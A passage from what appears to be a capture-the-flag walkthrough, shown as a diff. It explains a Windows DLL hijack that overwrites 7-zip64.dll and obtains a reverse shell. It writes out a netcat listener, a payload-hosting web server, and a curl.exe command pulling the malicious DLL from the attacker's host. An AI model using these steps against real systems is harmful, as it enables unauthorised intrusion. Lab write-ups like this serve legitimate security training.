githubEdit

 With this DLL, we take ownership of the Bginfo64.exe executable, grant everyone full access to it, download a static netcat binary from our machine, and then execute that netcat binary to get a reverse shell.
 We compile it with x86_64-w64-mingw32-gcc -shared windows_dll.c -o 7-zip64.dll.

-You can download the static netcat binary we use from this page (direct link).
+You can download the static netcat binary we use from this pagearrow-up-right (direct linkarrow-up-right).
 Note: The netcat binary you use matters.
-I originally used this one and that failed to launch a second reverse shell, which we need to do later.
+I originally used this onearrow-up-right and that failed to launch a second reverse shell, which we need to do later.

 We setup a listener with nc -nvlp 45446.
 Next, we start the web server with python -m http.server 5003.
 Finally, we overwrite the current DLL with ours by running curl.exe http://10.10.14.116:5003/7-zip64.dll -o X:\scripts\7-zip64.dll on the target.
 Then, wait about a minute and you should get a reverse shell.